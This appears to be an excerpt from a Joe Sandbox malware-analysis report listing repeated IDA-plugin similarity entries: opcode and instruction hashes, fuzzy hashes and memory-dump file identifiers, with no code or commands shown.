                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a3b33c6e407e26ee99ccc4fdfd1be3a7c89bac6b17b97e24a0c24ddfece50911
                                    • Instruction ID: 4dff5b666cd6209c034356071d3bdfefe9046ebe28e048dc235757ee54f57df5
                                    • Opcode Fuzzy Hash: a3b33c6e407e26ee99ccc4fdfd1be3a7c89bac6b17b97e24a0c24ddfece50911
                                    • Instruction Fuzzy Hash: 6641D531B09A4D4FDB94EFA8C469ABDB7F1EF99350B4402BAD40DD32A2DF2898458710
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 52c02a16c4e2be1711a2bfe5c941050b213f37951d6299978238e9649468a1fd
                                    • Instruction ID: 871b2bd1f06b87d990dc9d56ab44442dee4373cff951705c62ac2c9367c6a794
                                    • Opcode Fuzzy Hash: 52c02a16c4e2be1711a2bfe5c941050b213f37951d6299978238e9649468a1fd
                                    • Instruction Fuzzy Hash: 9431B721B1DA480FE798AA2C587A77876C2DFC8355F0506BEE04EC32E7DD245C458341
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 912c5b94fc0abb6ee1a8f2ec3c7063eb073ffe0f80361dd2bf8cb0467d943fce
                                    • Instruction ID: 35a58061af25febacb96738e806f9558fae9a5df1dfcd1a880059bd15358d957
                                    • Opcode Fuzzy Hash: 912c5b94fc0abb6ee1a8f2ec3c7063eb073ffe0f80361dd2bf8cb0467d943fce
                                    • Instruction Fuzzy Hash: 3B419030B0960E8FDB68EBA880656B977A1FF94360F150278D02ED36E6CE39A945C741
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8c7e021737e104d47d96e8a23f44e2e6356fc3c5f519f3dafe6e01d8cb1da094
                                    • Instruction ID: 0246c5c07bf228efdd783d1143ac2bed05588f695fbeb450c6db6380d467c311
                                    • Opcode Fuzzy Hash: 8c7e021737e104d47d96e8a23f44e2e6356fc3c5f519f3dafe6e01d8cb1da094
                                    • Instruction Fuzzy Hash: 5441CF34B09A4E8FDB44EBA89479AEDBBB1FFC8300F8146B5D009D3296CD286941C741
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b973c008926363c5f0144d4eb9f212d6713f65a484396b298c9827b70c4b005f
                                    • Instruction ID: 66f2e0d3223aeb32615e6b26d85b0c2c62542f5276f094b8f640aede7a16936b
                                    • Opcode Fuzzy Hash: b973c008926363c5f0144d4eb9f212d6713f65a484396b298c9827b70c4b005f
                                    • Instruction Fuzzy Hash: A131C111F18A094BEB94B7AC583E7BD76D2EFD8741F11027AE41DC32D6DE28A8458352
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6ffc3052abdbb6998942e14dc53ea1315d36d141a5df9a77c3ea3b454d5e1937
                                    • Instruction ID: ca34142569fb56cd4c45cf6fdfe5bdae49093ac16c29f6e4254fa7a9f69d69a7
                                    • Opcode Fuzzy Hash: 6ffc3052abdbb6998942e14dc53ea1315d36d141a5df9a77c3ea3b454d5e1937
                                    • Instruction Fuzzy Hash: 06315B72E0964E0FD7559BA89C625FA7B71FFC0290B0603B6D04AD71F3ED1829068390
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 10b0baee39c4e18b95f170ff1f99fff319ee4911dd32979dfba153435a5ed434
                                    • Instruction ID: fa85b94952b26816f662d513458c46b54788563082fbac4552dd5becb7c57ecf
                                    • Opcode Fuzzy Hash: 10b0baee39c4e18b95f170ff1f99fff319ee4911dd32979dfba153435a5ed434
                                    • Instruction Fuzzy Hash: 1331703150D7488FDB59DFA8D849AEABBF0EF56320F0482AFD089C7562D764A40ACB51
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8e84b54a45aa86b39749f8a912fd308499cab5555b3131c5b3f81c5337025f87
                                    • Instruction ID: 5524eae7bda8d49eabe84d0c1c0334623c3453885d23ed3faf7571f89f335033
                                    • Opcode Fuzzy Hash: 8e84b54a45aa86b39749f8a912fd308499cab5555b3131c5b3f81c5337025f87
                                    • Instruction Fuzzy Hash: 4731283060DA498FDB56FB7884955A937F0FF5630074503FAD409C72E2DA38B981C751
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 230b9aba092274d8a2e4ed334cacd5e620a0bd7a7296337db0624da892e5ed1b
                                    • Instruction ID: c546ed3cb76f37966e3002de787c89a0671a17d42d75d353ba18dd80d1cb046a
                                    • Opcode Fuzzy Hash: 230b9aba092274d8a2e4ed334cacd5e620a0bd7a7296337db0624da892e5ed1b
                                    • Instruction Fuzzy Hash: DA210621F0E30A4BF7A8A7B444366BD3291AFC1350F550379E01ECB6E7DE2DA9068341
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ba70248320c54fc7a6da370eb87fd41774f01f4097a534bd20b43cebdf62730d
                                    • Instruction ID: 912cd8b2c5883f0731b748e075466747c45c608a1110ed1b6b2be627a33c5da9
                                    • Opcode Fuzzy Hash: ba70248320c54fc7a6da370eb87fd41774f01f4097a534bd20b43cebdf62730d
                                    • Instruction Fuzzy Hash: A721F324B1DA995BE745B3E8583ABB877E1EF84300F4202B5E05DC32D3CD2869448352
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ea7b0e35159dfa0182a613a3d43ac9e021e34845062e5fe70b958217c5f913f7
                                    • Instruction ID: b30a5ea01edfef4d10bcbc06879770822d58aad2f4c07c81dadf568753363a12
                                    • Opcode Fuzzy Hash: ea7b0e35159dfa0182a613a3d43ac9e021e34845062e5fe70b958217c5f913f7
                                    • Instruction Fuzzy Hash: 50215B20B4D28A1FD751DBB448259F63BE1DFCA340B0502B6E08AC71F2CE2C99568351
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aaed146f9a2319c48560b31bc6eeae182d26c85b133b5c95051a5235aec65dc0
                                    • Instruction ID: 4b07e8b13012fa71f36401ad884c0b17138acf1ee7c6df6443dcf5a94475dead
                                    • Opcode Fuzzy Hash: aaed146f9a2319c48560b31bc6eeae182d26c85b133b5c95051a5235aec65dc0
                                    • Instruction Fuzzy Hash: F81125B1A08B8D4FD74DDB6894B92B97FF0EB99200B8445BFD44AE66A2CE341455C700
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eb1741b3b76fa12a4266c2eb5d5800bf1e7f8be1b40f6b6b53d93fd8cdeeb9d0
                                    • Instruction ID: 0b70aabc4baeb890e291c4325ddfbc9c7eb0bf9e7454f8bd06a7b6cfe258c3b0
                                    • Opcode Fuzzy Hash: eb1741b3b76fa12a4266c2eb5d5800bf1e7f8be1b40f6b6b53d93fd8cdeeb9d0
                                    • Instruction Fuzzy Hash: D511297270CA5C4FCBA4EB58A0B56B5F7E0FB98350744067ED44ED3295CE24A8418780
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dc03f1983392fcaeb5829b4e67c4d0b8963fbbe8a1266fe1403b6beba4f75a43
                                    • Instruction ID: 375ae9b3949c8505931a49e57a4cd05cb1a81e195bfdcb86ab5489fbc0bd8e0c
                                    • Opcode Fuzzy Hash: dc03f1983392fcaeb5829b4e67c4d0b8963fbbe8a1266fe1403b6beba4f75a43
                                    • Instruction Fuzzy Hash: BE01C06554F3CA6EDB6357B808240B67FA49E83254B4A47FBD0DDCB0F3D509161AC342
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5f5c19edcd6aa2a73256c36e137bd1cf8a50b079e370348bf40cfb7b6aba6fc4
                                    • Instruction ID: da87eccc7d812eb0e7f90d35231cc1f2d4de23612859acf3086207864aad84e8
                                    • Opcode Fuzzy Hash: 5f5c19edcd6aa2a73256c36e137bd1cf8a50b079e370348bf40cfb7b6aba6fc4
                                    • Instruction Fuzzy Hash: 62012271E1864D4FDB41AB6488665FE7BB0FF19301F4101BBE419C61E2EB3AA9408782
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb372870cc0c664db9195b26c643847e9c77ed4321169d1a8b82142a0dab8688
                                    • Instruction ID: 959db89e7827cfbdbacbab5e93854d3a6887a3c87d68820a9f6957be226be513
                                    • Opcode Fuzzy Hash: bb372870cc0c664db9195b26c643847e9c77ed4321169d1a8b82142a0dab8688
                                    • Instruction Fuzzy Hash: 8C01FC31F1EA0A4AEB58BBB44C766A97790EF50364F05077CC41AC70E6DE1DB44E82D1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 098a8bd03f22c5e44fdf39d3ed2fc11ca22d2b20dbcb3039945f58ee5c90e5f8
                                    • Instruction ID: 4685c5931db3dc3cf4d7d4884ba42aab92b74971f54403bcc3d0521236bf1fd6
                                    • Opcode Fuzzy Hash: 098a8bd03f22c5e44fdf39d3ed2fc11ca22d2b20dbcb3039945f58ee5c90e5f8
                                    • Instruction Fuzzy Hash: 0C012610F4E75A4FE7A863B8443A2783A91EF95300F4603BAD05EC6EE3DE2C6C058341
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 57e6c24e88596777fd53e1fe286b244c1e384ac3fc844df24bf12ab0c4f2e5e0
                                    • Instruction ID: 6cb457383b9cebf07eead72575bc9351d49dd3dbcaa612f399fa9821136266e7
                                    • Opcode Fuzzy Hash: 57e6c24e88596777fd53e1fe286b244c1e384ac3fc844df24bf12ab0c4f2e5e0
                                    • Instruction Fuzzy Hash: 5AF0AD70E0E20A4EE364E7948460AB837A1AFD13A0F510774D01D865F1DE28A99A8240
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 261114fd37b5bfb03ef0d87c812a05635a71bd38a49dce23cc1804a588585241
                                    • Instruction ID: ef3cc158facc5b9dd0b33a194c4cac8de1b45c8722e961f91060e3c885d66ee0
                                    • Opcode Fuzzy Hash: 261114fd37b5bfb03ef0d87c812a05635a71bd38a49dce23cc1804a588585241
                                    • Instruction Fuzzy Hash: 4BE0C232C5B38D4FDBB15AA448621E97F70FF95A00F45139BE95C86062EA25A6198382
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4de5b366cc29eb730585719bc1b5b5e789fba9fd2b1ed519bbf4c0be611b54ef
                                    • Instruction ID: 305c80f3601a6b62aca20b7883b0856e39630c6293e3bf937cf7e79e322ae206
                                    • Opcode Fuzzy Hash: 4de5b366cc29eb730585719bc1b5b5e789fba9fd2b1ed519bbf4c0be611b54ef
                                    • Instruction Fuzzy Hash: 89D0C200C0F2860EE71B22F40CA24C57F108A471E0F5A03D1D458C60F3E88D259E8372
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 359c8a37e6012d6ab00e0106003c9303c19fa681d1208fb6f02aba2812014109
                                    • Instruction ID: 188e863766fb15c540bee0236ba99c7380af1ae96312d77745e991582aafadee
                                    • Opcode Fuzzy Hash: 359c8a37e6012d6ab00e0106003c9303c19fa681d1208fb6f02aba2812014109
                                    • Instruction Fuzzy Hash: 18E0C27181D7CE5FCB136B6058111E57F30FE02200B8A02E7F8ACCA0A3DA2916298393
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 88a0569c490e08d6c2efd8a2432baee6b60b144799a5d91775fc20e241b61fd3
                                    • Instruction ID: aff6a5ad59a537df8d6ea9b7b55aeacc6c836da3221c5f59fd314c3b5f867760
                                    • Opcode Fuzzy Hash: 88a0569c490e08d6c2efd8a2432baee6b60b144799a5d91775fc20e241b61fd3
                                    • Instruction Fuzzy Hash: BCC09B0FD0C0E201E715727871364EC1B600F4332F73DD1F1D16D0C8D74C0810854155